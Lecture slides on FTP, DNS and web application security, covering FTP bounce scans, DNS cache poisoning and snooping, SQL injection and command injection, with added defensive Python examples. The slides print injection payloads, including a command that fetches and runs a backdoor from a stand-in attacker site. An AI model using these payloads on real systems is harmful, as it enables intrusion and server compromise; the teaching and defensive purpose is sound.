Application Layer Security - PowerPoint PPT Presentation


Presentation Transcript

1. Application Layer Security. Lecture 8. Supakorn Kungpisdan, supakorn@mut.ac.th. NETE4630

2. Outline
• FTP Security
• DNS Security
• Web Application Security

3. FTP Security Issues
• All traffic is transmitted in clear text
• Weak configuration on FTP allows brute force and dictionary attacks
• Anonymous access may be enabled on the FTP server
• If file permissions are not set, an anonymous user may be able to read, overwrite, or delete files, leading to loss of confidentiality, integrity, and availability of data
• If anonymous access is being used on a server, make sure that the proper restrictions are enforced for this user

4. Active FTP
• The client connects from a random unprivileged port (N > 1023) to the FTP server's command port, port 21. The client also sends the FTP command PORT N+1 from port N to port 21 at the FTP server. The client then starts listening on port N+1
• The server returns the response from port 21 to port N at the client
• The server will then connect back to the client's specified data port from its local data port (port 20) to the client at port N+1
Ref: http://slacksite.com/other/ftp.html

5. Firewall VS Active FTP
• From the server-side firewall's standpoint, to support active mode FTP the following communication channels need to be opened:
  • FTP server's port 21 from anywhere (Client initiates connection)
  • FTP server's port 21 to ports > 1023 (Server responds to client's control port)
  • FTP server's port 20 to ports > 1023 (Server initiates data connection to client's data port)
  • FTP server's port 20 from ports > 1023 (Client sends ACKs to server's data port)

6. Active FTP (cont.)
(figure: debug session) Client port = (14*256)+178 = 3762. Letters in red show client input; letters in black show server output.

7. Active FTP (cont.)
• The client's command port contacts the server's command port (port 21) and sends the command PORT 1027 (N+1).
• The server sends an ACK back from its port 21 to the client's command port (port 1026, i.e. port N).
• The server initiates a connection on its local data port (port 20) to the data port the client specified earlier (port 1027).
• The client sends an ACK back from port 1027 to the server's port 20.

8. Problems of Active FTP
• The FTP client doesn't make the actual connection to the data port of the server
• The FTP client simply tells the server what port it is listening on (N+1) and waits for the server to connect back to the specified port on the client.
• From the client-side firewall's standpoint, this appears to be an outside system initiating a connection to an internal client
• This connection may be blocked
• Because the server initiates the data connection, the server may connect to a different client

9. Passive FTP
• To solve the problem of active FTP, use passive FTP
• When opening an FTP connection, the client opens two random unprivileged ports locally (N > 1023 and N+1).
• Port N contacts the server on port 21, but instead of then issuing a PORT command and allowing the server to connect back to its data port, the client will issue the PASV command.
• The server then opens a random unprivileged port (P > 1023) and sends the PORT P command back to the client.
• The client then initiates the connection from port N+1 to port P on the server to transfer data.

10. Firewall VS Passive FTP
• From the server-side firewall's standpoint, to support passive FTP, the following communication channels need to be opened:
  • FTP server's port 21 from anywhere (Client initiates connection)
  • FTP server's port 21 to ports > 1023 (Server responds to client's control port)
  • FTP server's ports > 1023 from anywhere (Client initiates data connection to random port specified by server)
  • FTP server's ports > 1023 to remote ports > 1023 (Server sends ACKs (and data) to client's data port)

11. Passive FTP (cont.)
(figure: the server specifies the port number)

12. Passive FTP
• The client contacts the server on the command port (port N=1026) and issues the PASV command.
• The server then replies with PORT 2024, telling the client which port it is listening on for the data connection.
• The client then initiates the data connection from its data port (N+1=1027) to the specified server data port (port 2024).
• The server sends back an ACK (from its port 2024) to the client's data port (port 1027).
You can see that the client initiates the data connection with the FTP server, so it will not be blocked by the firewall.

13. Problems of Passive FTP
• The FTP server needs to allow remote connections to high-numbered ports on the server.
• Fortunately, many FTP daemons, including the popular WU-FTPD, allow the administrator to specify a range of ports which the FTP server will use.
• Not all FTP clients support passive mode.

14. FTP Bounce Scan
• The FTP bounce attack uses a third workstation to act as a proxy between the nmap host and the destination station.
• With passive FTP, a user could send a PORT command to an FTP server that would direct the data towards a completely different host!
• The FTP bounce attack takes advantage of these poorly-configured FTP servers (no control over ranges of FTP ports)
• The data is BOUNCED from the FTP server to the target host

15. FTP Bounce Scan (cont.)
(figure: closed port vs. open port)

16. Advantages of FTP Bounce Scan
• The FTP bounce attack can scan "through" a firewall.
• The FTP bounce attack uses standard FTP functionality. Nmap does not require specialized packet configurations or changes to the FTP protocol.
• Therefore, the FTP bounce attack does not require any privileged access.

17. Disadvantages of FTP Bounce Scan
• The FTP bounce attack depends on the availability of an FTP server that allows a PORT command to redirect the data connection to a third device.
• Most FTP servers have their default configuration set to protect against this use of the PORT command

18. Other FTP Bounce Attack
• When using active FTP, a client uses the PORT command to specify the IP address and port number that the server should connect to for the data connection
• An attacker with access to an FTP server can bounce through the server by specifying someone else's IP address
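The PORT command's h1,h2,h3,h4,p1,p2 encoding (the (14*256)+178 arithmetic of slide 6) and the server-side policy that closes the bounce described in slides 14 to 18, as an added example in Python; this is not code from the slides, and the control-connection peer address is a constructed value.

```python
import ipaddress
import re

# Constructed address of the client on the FTP control connection (port 21).
CONTROL_PEER = "192.0.2.10"

_PORT_RE = re.compile(
    r"^PORT (\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})$"
)


def parse_port_command(line: str) -> tuple[str, int]:
    """Decode 'PORT h1,h2,h3,h4,p1,p2' into (ip, port), port = p1*256 + p2."""
    m = _PORT_RE.match(line.strip())
    if not m:
        raise ValueError(f"malformed PORT command: {line!r}")
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    if any(x > 255 for x in (h1, h2, h3, h4, p1, p2)):
        raise ValueError(f"octet out of range in PORT command: {line!r}")
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def check_data_target(line: str, control_peer: str) -> tuple[bool, str]:
    """Server-side anti-bounce policy: the data connection may only go back to
    the host that owns the control connection, and only to an unprivileged
    port (> 1023). A PORT naming any other host is the bounce of slide 18."""
    try:
        ip, port = parse_port_command(line)
    except ValueError as exc:
        return False, str(exc)
    if ipaddress.ip_address(ip) != ipaddress.ip_address(control_peer):
        return False, f"PORT target {ip} differs from control peer {control_peer}"
    if port <= 1023:
        return False, f"PORT target port {port} is privileged"
    return True, f"data connection to {ip}:{port} allowed"
```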

19. Outline
• FTP Security
• DNS Security
• Web Application Security

20. Domain Name System
• DNS is a distributed database that holds information for mapping host names to IP addresses
• DNS uses both UDP and TCP.
• UDP is typically used for queries, unless the lookup or response is greater than 512 bytes
• TCP is used for lookups and for zone transfers
• Integrity and availability of DNS are critical for the health of the Internet. It is used in conjunction with almost every other protocol on the Internet
• Availability was considered while designing DNS; however, security was not

21. DNS Request (figure)

22. DNS Response (figure)

23. DNS Lookup Process
(figure: Host A and Host A's authoritative name server, steps 1 and 2)
• Host A sends a request to the resolver (at Host A). It checks the local cache and may check the hosts file
• The resolver at Host A forwards the request to its authoritative name server

24. DNS Non-recursive Query
(figure: Host A, Host A's authoritative name server, Host B's authoritative name server, Host B; steps 1 to 5)
Step 3: Find the address of the authoritative name server of the requested domain and return its address to the resolver

25. DNS Recursive Query
(figure: Host A, Host A's authoritative name server, Host B's authoritative name server, Host B; steps 1 to 5)
Step 3: The server finds the address of the authoritative name server of the requested domain, passes the request on to that server, and returns a response to the resolver

26. DNS Hierarchy (Recursive Query)
(figure: steps 1 to 8 through the .com TLD server) What happens if (2) is a recursive query? Legend: 1. recursive query; 2. non-recursive query

27. DNS Utilities
• Most OSes come with a tool called nslookup, capable of querying DNS servers for various types of information
• The dig tool shipped with UNIX has similar capabilities

28. Name-to-IP Lookup (figure)

29. MX Lookup with nslookup (figure)

30. DNS Security Issues
• DNS lacks authentication and integrity checking
• Due to the lack of authentication, attackers can spoof DNS messages to perform a variety of attacks
• Due to the lack of integrity checking, attackers can intercept and modify messages in transit

31. DNS Zone Transfer
• For redundancy, administrators deploy both primary and secondary name servers that contain the same DBs
• To keep the DBs synchronized with the primary name server, the secondary name server periodically connects to the primary name server on port 53/TCP and grabs the DNS records
• This process is called a Zone Transfer

32. DNS Information Gathering
• DNS can provide a great deal of information about the target network and its hosts
• One of the common insecure configurations with DNS is allowing anyone to perform zone transfers on one of a domain's DNS servers
• If an attacker can perform a zone transfer with the primary or secondary name servers for a domain, he/she will be able to view all DNS records for that domain
• See a demo at http://www.mindterra.com/blog/?p=179
• Solved by specifying the IP addresses that are allowed to perform the zone transfer, or by using Transaction Signatures (TSIG)

33. DNS Cache Poisoning
• Both DNS clients and servers cache responses for a period of time in order to increase performance and reduce network traffic
• If an attacker can spoof a response for a DNS request, he/she may be able to contaminate the DNS cache with an incorrect record
• This process is known as DNS cache poisoning
• The only real defense built into DNS is the use of a random Transaction ID and source port
• Some versions of BIND use Transaction IDs that are not sufficiently random, and some use sequential Transaction IDs
• BIND 9 Cache Poisoning

34. DNS Cache Poisoning (cont.)
• The attacker sends a large number of recursive requests for www.syngress.com to ns.hackthestack.com
• ns.hackthestack.com forwards the requests to other name servers until it eventually sends the requests to Syngress's name server ns.syngress.com
• ns.hackthestack.com is now expecting to receive a large number of replies from ns.syngress.com.
• Before they arrive, the attacker could flood ns.hackthestack.com with a large number of packets spoofed from ns.syngress.com
• The attack will be successful if the spoofed packets have the correct combination of TID and port number

35. DNS Cache Snooping
• The recursion bit tells the DNS server whether the query is recursive or non-recursive
• The remote DNS server may answer queries for 3rd-party domains which do not have the recursion bit set.
• This may allow a remote attacker to determine which domains have recently been resolved via this name server, and therefore which hosts have been recently visited.
Ref: www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf
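The DNS header fields behind slides 33 to 35 (the 16-bit Transaction ID and the recursion-desired bit) and the resolver-side rule that a reply is accepted only if its TID, the source it came from and the port it arrives on all match a query actually sent, as an added Python example; it is not code from the lecture and builds header-only messages rather than full packets.

```python
import secrets
import struct
from dataclasses import dataclass


@dataclass
class DnsHeader:
    tid: int       # 16-bit Transaction ID
    qr: bool       # True for a response
    rd: bool       # Recursion Desired: the "recursion bit" a snooper clears
    ra: bool       # Recursion Available
    qdcount: int
    ancount: int


def parse_header(msg: bytes) -> DnsHeader:
    """Decode the fixed 12-byte DNS header (RFC 1035, section 4.1.1)."""
    if len(msg) < 12:
        raise ValueError("truncated DNS message")
    tid, flags, qd, an, _ns, _ar = struct.unpack("!6H", msg[:12])
    return DnsHeader(tid, bool(flags & 0x8000), bool(flags & 0x0100),
                     bool(flags & 0x0080), qd, an)


def build_message(tid: int, response: bool, recursion_desired: bool) -> bytes:
    """Header-only message (QDCOUNT=1, as if one question followed)."""
    flags = (0x8000 if response else 0) | (0x0100 if recursion_desired else 0)
    return struct.pack("!6H", tid, flags, 1, 1 if response else 0, 0, 0)


def send_query(outstanding: set, server_ip: str) -> tuple[int, bytes]:
    """Issue a query with a random TID and a random ephemeral source port and
    remember both; a spoofed reply must guess the pair, not just the TID."""
    tid = secrets.randbelow(1 << 16)
    local_port = 1024 + secrets.randbelow(65536 - 1024)
    outstanding.add((local_port, server_ip, tid))
    return local_port, build_message(tid, response=False, recursion_desired=True)


def accept_response(outstanding: set, local_port: int, src_ip: str, msg: bytes) -> bool:
    """Cache a reply only if it is a response arriving on the port we queried
    from, from the server we asked, with the TID we sent; then retire the key
    so a second copy cannot be replayed."""
    hdr = parse_header(msg)
    key = (local_port, src_ip, hdr.tid)
    if not hdr.qr or key not in outstanding:
        return False
    outstanding.discard(key)
    return True
```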

36. Possible Scenario
• If an attacker was interested in whether your company utilizes the online services of a particular bank, they can use this attack to build a statistical model regarding company usage of the bank mentioned above.
• This attack can also be used to find B2B partners, web-surfing patterns, external mail servers, and more...
• Two techniques are available: using non-recursive queries and using recursive queries
• Some DNS servers allow both types of queries, but some allow only recursive queries to be made

37. DNS Cache Snooping with Non-recursive Queries
(figure: query output) The attacker queries ns1.tvcabo.pt for www.sidestep.pt. ns1.tvcabo.pt does not have the entry in its local cache. It returns no answer, but gives a list of .pt TLD name servers for further questions

38. DNS Cache Snooping with Non-recursive Queries (cont.)
• The fact that ns1.tvcabo.pt does not have the entry in its local cache means that no host under ns1.tvcabo.pt has communicated with www.sidestep.pt before.
• Thus, this organization does not use services provided by www.sidestep.pt

39. DNS Cache Snooping with Non-recursive Queries (cont.)
• If the attacker executes the same query again and checks the response: this time, ns1.tvcabo.pt has cached the entry, so it returns the answer

40. DNS Cache Snooping with Recursive Queries
• Used to determine with some degree of precision (not 100% sure) whether a given record is present in the cache
• However, this will pollute the cache
• If a given record is not present in the cache, it will be after the first query is made
• This is because a recursive query will always return the answer for the given record

41. DNS Cache Snooping with Recursive Queries
• Try to see if www.sidestep.pt was cached in ns1.tvcabo.pt
• Query ns1.tvcabo.pt for www.sidestep.pt and record the TTL

42. DNS Cache Snooping with Recursive Queries (cont.)
• Then query ns.sidestep.pt (Sidestep.com's authoritative DNS) for www.sidestep.com and compare the TTL

43. DNS Cache Snooping with Recursive Queries (cont.)
• The TTL for www.sidestep.pt at ns1.tvcabo.pt (6458) is much lower than the initial TTL (86400) (the TTL at ns.sidestep.pt)
• This is a good indicator that the answer was already cached at ns1.tvcabo.pt
• Another way to look for cached responses is to observe the time that the query takes to process.
• If the query time is approximately equal to the round trip time (RTT) of a packet to the server, then the answer might have been already present in the cache.

44. A Safer BIND Configuration (figure: configuration excerpt)

45. Outline
• FTP Security
• DNS Security
• Web Application Security

46. Attacking Web Applications
• The majority of vulnerabilities are caused by a lack of proper input validation by the application before processing user-supplied data
• This can allow attackers to disclose information about the site, steal information from backend DBs, or execute binary code on the web server
S. Kungpisdan

47. SQL Injection
• Many web applications rely on backend DBs for information storage and retrieval.
• Sometimes a script will perform a DB query using input supplied from a web page, without verifying that the input does not contain any escape characters
• Consider the following:
  $query = "SELECT * FROM users WHERE username = '{$_POST['user']}' AND password = '{$_POST['pass']}'";
• With a crafted password value, the query becomes:
  "SELECT * FROM users WHERE username = 'bob' AND password = ' ' OR 1=1 ''";
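The slide's login query run both ways, as an added Python example that is not part of the lecture: the string-spliced form fails open on an `OR 1=1` password (the `--` comment variant is used so the statement parses), while the parameterized form treats the same input as plain data. The users table and its rows are constructed test data.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the backend DB of the slides."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("bob", "s3cret"), ("alice", "hunter2")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, pw: str) -> int:
    """Mirrors the slide's PHP: form values are spliced straight into the SQL
    text, so a quote in `pw` ends the literal and the rest becomes SQL.
    Returns the number of matching rows (a non-zero count means 'logged in')."""
    query = (f"SELECT * FROM users WHERE username = '{user}' "
             f"AND password = '{pw}'")
    return len(conn.execute(query).fetchall())


def login_parameterized(conn: sqlite3.Connection, user: str, pw: str) -> int:
    """Hardened form: '?' placeholders are bound by the driver, so the query
    structure is fixed before any user data is seen. Same inputs, same
    return convention, but the injected text is just a password that
    matches nobody."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return len(conn.execute(query, (user, pw)).fetchall())
```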

48. Code Injection
• Sometimes user-supplied strings are not properly checked for escape characters before being passed to commands as arguments
• Consider a PHP script that takes a string supplied from a web page form and passes it to the nslookup utility

49. Code Injection (cont.)
• If the user supplies ;ls -la /, the script will execute the command nslookup;ls -la /, resulting in a listing of the root directory being printed out

50. Code Injection (cont.)
• The wget and perl commands could be used to download and run a backdoor on the web server by supplying the following line to the script
• ;wget http://attackersite/backdoor.pl;perl backdoor.pl
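The nslookup wrapper of slides 48 to 50 in its vulnerable and hardened forms, as an added Python example (the lecture's script is PHP and is not reproduced here): the fix is an allow-list check on the host name plus passing it as a single argv element with no shell, so `;` and friends never reach a command interpreter. The host-name pattern follows RFC 1123 label rules; `run_lookup` is only defined, not exercised, since it needs a network.

```python
import re
import subprocess

# RFC 1123 host name: dot-separated labels of letters, digits and hyphens,
# 1 to 63 characters each, neither starting nor ending with a hyphen.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")


def is_valid_hostname(name: str) -> bool:
    """Allow-list check: only what a DNS name may contain, nothing else."""
    return len(name) <= 253 and bool(_HOSTNAME_RE.match(name))


def build_lookup_command_vulnerable(user_input: str) -> str:
    """Mirrors the slide's script: the form value is concatenated into a
    command line handed to a shell, so ';ls -la /' appends a second command."""
    return "nslookup " + user_input


def build_lookup_argv(user_input: str) -> list[str]:
    """Hardened form: reject anything that is not a host name, then pass the
    value as one argv element. Even if validation were skipped, an argv list
    with shell=False cannot be split into extra commands."""
    if not is_valid_hostname(user_input):
        raise ValueError(f"rejected lookup target: {user_input!r}")
    return ["nslookup", user_input]


def run_lookup(user_input: str) -> subprocess.CompletedProcess:
    """Execute the validated lookup without a shell (argv goes to execve)."""
    return subprocess.run(build_lookup_argv(user_input), capture_output=True,
                          text=True, timeout=10, shell=False)
```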